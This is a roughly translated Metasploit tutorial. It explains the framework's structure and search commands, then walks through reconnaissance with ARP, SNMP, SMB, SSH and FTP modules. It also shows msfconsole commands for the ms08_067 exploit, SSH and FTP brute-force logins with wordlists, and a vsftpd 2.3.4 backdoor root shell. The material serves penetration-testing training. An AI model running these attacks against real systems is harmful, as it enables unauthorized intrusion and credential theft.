Metasploit penetration testing framework (1)

Directory

1. Introduction to Metasploit Penetration Testing Framework

1. Metasploit framework

2. Metasploit directory structure

2. Basic usage of Metasploit

1. The connect command in the core command

2. How to use module-related commands show

3. How to use the module-related command search search

4. How to use the module-related command use

5. How to use the module-related command info

3. Information collection for Metasploit penetration testing

1. Collect host information based on tcp protocol

(1) Use nmap and arp_sweep in Metasploit to collect host information

(2) Use semi-connection mode to scan TCP port

2. Collect host information based on SNMP protocol

3. Collect information based on SMB protocol

(1) Use smb_version to scan the version number based on the SMB protocol

(2) Use smb_enumshares to scan shared files (account, password) based on SMB protocol

(3) Use smb_lookupsid to scan system user information (SID enumeration)

4. Collect information based on SSH protocol

(1) View the version information of the ssh service

(2) Brute force cracking of SSH

5. Collect information based on FTP protocol

(1) View the version information of the ftp service

(2) FTP anonymous login scan

(3) FTP brute force cracking

1. Introduction to Metasploit Penetration Testing Framework

1. Metasploit system framework

1. Basic library: metasploit basic library files are located in the libraries directory under the root directory path of the source code, including

Rex, framework-core and framework-base three parts.

Rex is the most basic component that the whole framework depends on
, such as wrapped network sockets, network application protocol client and server implementations, logging subsystems, penetration attack support routines, PostgreSQL and MySQL database support, etc.;

The framework-core library is responsible for implementing all the interactive interfaces with various types of upper-level modules and plug-ins;

The framework-base library extends framework-core to provide simpler wrapper routines and provide support for handling various aspects of the framework

The functions provide some functional classes to support the user interface and functional programs to call the framework’s own functions and framework integration modules;

2. Module: The module organization is divided into 6 types of modules (Modules) according to different purposes:
Divided into auxiliary module (Aux), penetration attack module (Exploits), post-penetration attack module (Post), attack load module
(payloads), encoder module (Encoders), empty instruction module (Nops).

Note: payload is also known as
Attack Payload
It is mainly used to establish a stable connection between the target machine and the attack machine. It can return to the shell and perform program injection.

3. Plug-ins: Plug-ins can extend the functions of the framework, or assemble components with existing functions to form advanced features. Plug-ins can integrate some existing external security tools, such as Nessus, OpenVAS vulnerability scanner, etc., to provide some new functions for the user interface.

4. Interface: including msfconsole control terminal, msfcli command line, msfgui graphical interface, armitage graphical interface

face and the msfapi remote call interface.

5. Functional programs: metasploit also provides a series of functional programs that can be run directly to support penetration testers and security personnel to quickly implement

Quickly use the internal capabilities of the metasploit framework to complete some specific tasks. such as msfpayload, msfencode, and

msfvenom can encapsulate the attack payload into executable files, C language, JavaScript language and other forms, and can perform various types of encoding.

2, Metasploit directory structure

Change to the Metasploit working directory

data: Editable files used by Metasploit

documentation: Provides documentation for the framework

lib: framework code library

modules: the actual MSF modules

plugins: Plugins that can be loaded at runtime

scripts: Meterpreter and other scripts

tools: various useful command-line tools

Second, the basic usage of Metasploit

Metasploit Basic Commands

The Metasploit program requires a Postgresql database.

Postgresql overview:

PostgreSQL is a free software object-relational database management system (ORDBMS) with very complete features.
An object-relational database management system based on POSTGRES 4.2 version developed by the Computer Department of State University.

Extension: Differences between PostgreSQL and MySQL data application scenarios:

In terms of application scenarios, PostgreSQL is more suitable for strict enterprise application scenarios (such as finance, telecommunications, ERP, CRM), while
MySQL is more suitable for Internet scenarios with relatively simple business logic and low data reliability requirements

Start the database manually

┌──(rootkali)-[~]
└─# systemctl start postgresql
                                                                                                                          
┌──(rootkali)-[~]
└─# systemctl enable postgresql
Synchronizing state of postgresql.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install enable postgresql
Created symlink /etc/systemd/system/multi-user.target.wants/postgresql.service → /lib/systemd/system/postgresql.service.

There are two ways to start Metasploit.

first click icon

The second is to use the terminal command

└─# msfdb run

After the startup is complete, there will be some statistical information, such as the version number, how many exploits, how many payloads, etc.

msf6 > help

#View help information.

Note: You can have an overall understanding of msf by viewing the help through help, and you can see that msf-related commands can be divided into the following types:

Core Commands #core command

Module Commands #module command

Job Commands #background task command

Resource Script Commands #Resource script command

Database Backend Commands #Database backend command

Credentials Backend Commands #Certificate/credential backend command

Developer Commands #Developer Commands

Let’s explain our commonly used commands below.

1, the connect command in the core command

The connect command is mainly used to connect to the host remotely. Generally used for intranet penetration. The more commonly used command is “connect

192.168.1.1 80”

192.168.1.1 is the IP address and 80 is the port number.

2. “2. How to use the command of the module

The show command is used a lot.

Valid parameters for the “show” command are: all, encoders, nops, exploits, payloads, auxiliary, post,

plugins, info, options

Example 1: List all penetration attack module exploits in the metasploit framework.

msf6 > show exploits

#List all penetration attack modules in the metasploit framework. This command lists more data,
More time consuming.

msf6 > show payloads #List all attack payloads in the metasploit framework.

msf6 > show auxiliary #List all auxiliary attack payloads in the metasploit framework.

When you use msfconsole, you will use various vulnerability modules, various plug-ins and so on. So the search command is just
important.

When you type search -h will list some options of the search command.

msf6 > search -h

Usage: search
[ options ] #mainly add options and keywords after search

Example 1: Search by name keyword

Here you need to use the name: command

msf5 > search mysql # After search, directly follow the content to be searched, and the search is very extensive. Only if you are very descriptive of the vulnerability name

When it is clear, use this method

example:
First find out the ms08_067 vulnerability module you want.

msf6 > search ms08_067

Syntax: Search
Keywords parameter
:
Keywords

like msf6 > search
name
:
mysql#
To find vulnerabilities in the mysql database

Each exploit module is marked with a Rank field based on their potential impact on the target system.

Users can search, classify and sort exploit modules based on Rank.

Rank in descending order of reliability:

excellent
The exploit will never crash the target service, like SQL injection, command execution, remote file inclusion,

Local file includes and more. Typical memory corruption exploits cannot be evaluated at this level unless there are special circumstances.

great
The exploit has a default target system and can automatically detect the appropriate target system, or

After the version check of the service, it can return to a specific return address.

good
The exploit has a default target system and is a “common case” for this type of software (the

Windows 7, Server’s 2012, etc.)

normal
The exploit is reliable, but version-specific, and cannot or cannot be reliably auto-detected.

average
The exploit is unreliable or difficult to exploit.

low
The exploit is nearly impossible (or less than 50% successful) for common platforms

manual
The exploit is either unstable or difficult to exploit and is denial of service (DOS) based. If a module is only used in

It will be used only when the user specially configures the module, otherwise the module will not be used, so it can also be rated as this level.

Example 2: Find by path

Sometimes, we only remember the path of the module, but forget the name of the module. Then you can use the path: command to find the
All modules under the path. If I want all mysql utilization modules under the mysql path, then enter:

msf6>search path:mysql

Example 3: Narrowing your query

Keyword: platform
[
?
pl
?
tf

m] platform

Function: Modules affecting this platform: List the modules that can affect this platform, that is, better vulnerabilities

Sometimes we will search for a large number of modules, then we can use the platform: command to narrow the scope of the query. Use the platform command

After the order,
The query results will list the modules with higher rank
. If I want to find mysql vulnerabilities, then enter:

msf6 > search platform:mysql

Example 4: Find by type

The type: command is used here.

type : specific type of module (exploit, payload, auxiliary, encoder, evasion, post, or nop)

To search for exploit modules, type:

msf6 > search type: exploit

Example 5: Union lookup

You can use the above parameters to match and use them yourself. If I want to find exploit related vulnerabilities of mysql. Then type:

msf6>search name:mysql type:exploit

use Use parameters. If you want to use a module, use the use command

Syntax: use module name

info : Display information about the module.

Method 1: info module name

From the message that pops up, the things to focus on are:

(1) available targets,
It is to see which operating systems can be attacked

(2) Basic options: Related parameters needed to call the vulnerability

(3) Vulnerability description and execution process:

(4) Reference documents

Method 2: Use the show command to view information about the module

msf6 exploit(windows/smb/ms08_067_netapi) > show options #View module options

msf6 exploit(windows/smb/ms08_067_netapi) > show targets #Check which operating systems can be attacked

Set the RHOSTS parameter to specify the target machine of the attack

msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 192.168.1.109

msf6 exploit(windows/smb/ms08_067_netapi) > show options #View the set value

After the configuration is complete, we can execute the module by typing exploit or run.

msf6 exploit(windows/smb/ms08_067_netapi)>
back#
Use back to exit loaded modules

Note: Do not use exit, exit will directly exit the Metasploit program

3. Information collection for Metasploit penetration testing

1. Collect host information based on tcp protocol

(1) Use nmap and arp_sweep in Metasploit to collect host information

There is also NMAP tool in Metasploit

ARP scanning

msf6 > use auxiliary/scanner/discovery/arp_sweep

Check which parameters the module needs to configure

msf6 auxiliary(scanner/discovery/arp_sweep) > show options

Configure RHOSTS (target network for scanning)

msf6 auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 192.168.1.0/24

SHOST and SMAC are used to spoof source IP and MAC addresses.

Configure the number of threads

msf6 auxiliary(scanner/discovery/arp_sweep) > set THREADS 30

msf6 auxiliary(scanner/discovery/arp_sweep) > run

msf6 auxiliary(scanner/discovery/arp_sweep) > back #Exit a bit

(2) use semi-connection mode to scan TCP port

msf6>search portscan

2. Collect host information based on SNMP protocol

Simple Network Management Protocol (SNMP, Simple Network Management Protocol), a set of network management standards

Standard composition, including an application layer protocol (application layer protocol), database model (databaseschema) and a
Group resource object. The protocol supports network management systems to monitor devices connected to the network for any conditions of administrative concern.

Actual combat – use snmp_enum module to scan target server information through snmp protocol

msf6>use auxiliary/scanner/snmp/snmp_enum

msf6 auxiliary(scanner/snmp/snmp_enum) > show options

msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 192.168.1.180

msf6 auxiliary(scanner/snmp/snmp_enum) > run

Note: You can see that there is a lot of information detected through the snmp protocol.
Such as server hardware information and the process currently running on the server, these two aspects cannot be obtained by other scanning methods.

3.Collect information based on SMB protocol

SMB overview: Server Message Block (SMB for short), also known as network file sharing system

(Common Internet File System, abbreviated as CIFS), an application layer network transmission protocol, developed by Microsoft, the main function
Enables machines on a network to share resources such as computer files, printers, serial ports, and communications.

Redeveloped by Unix server vendors, it can be used to connect Unix servers and Windows clients to perform tasks such as printing and file sharing.

(1) Use smb_version to scan version number based on SMB protocol

msf6 > use auxiliary/scanner/smb/smb_version

Note: The version number of the operating system can be scanned, and the version number is very accurate.

(2) Use smb_enumshares to scan shared files (account, password) based on SMB protocol

The user name and password can basically be configured in the SMB module, and the scanning results of some modules with the user name and password configured will better meet our needs.

Enumerate Shares

msf6 > use auxiliary/scanner/smb/smb_enumshares

You can see that one is the xuegod shared file directory we set earlier and the other four are hidden shared directories.

(3) Use smb_lookupsid to scan system user information (SID enumeration) >

msf6 > use auxiliary/scanner/smb/smb_lookupsid

4. Collect information based on SSH protocol

(1) View the version information of the ssh service

msf6>use auxiliary/scanner/ssh/ssh_version

(2) Brute force SSH

msf6>use auxiliary/scanner/ssh/ssh_login

msf6 auxiliary(scanner/ssh/ssh_login) >
set USERPASS_FILE /usr/share/metasploit

framework/data/wordlists/root_userpass.txt

5. Collect information based on FTP protocol

(1) View version information of ftp service

Load the ftp service version scanning module

msf6 > use auxiliary/scanner/ftp/ftp_version

The scan result is: vsFTPd 2.3.4

msf6 auxiliary(scanner/ftp/ftp_version) > back

Scan the version number of the ftp service, we can try to search the version number to see if there are any modules that can be used

msf6>search 2.3.4

We found an exploit module and a backdoor in this version of the ftp service

Let’s try to use this module

msf6>use exploit/unix/ftp/vsftpd_234_backdoor

Got the shell, and it is root authority, we try to execute the following command

Execute the id command to view the current user

(2) ftp anonymous login scan

msf6 > use auxiliary/scanner/ftp/anonymous

(3)ftp brute force cracking

msf6>use auxiliary/scanner/ftp/ftp_login

msf6 auxiliary(scanner/ftp/ftp_login)>
set USERPASS_FILE /usr/share/metasploit-

framework/data/wordlists/root_userpass.txt

syntaxbug.com © 2021 All Rights Reserved.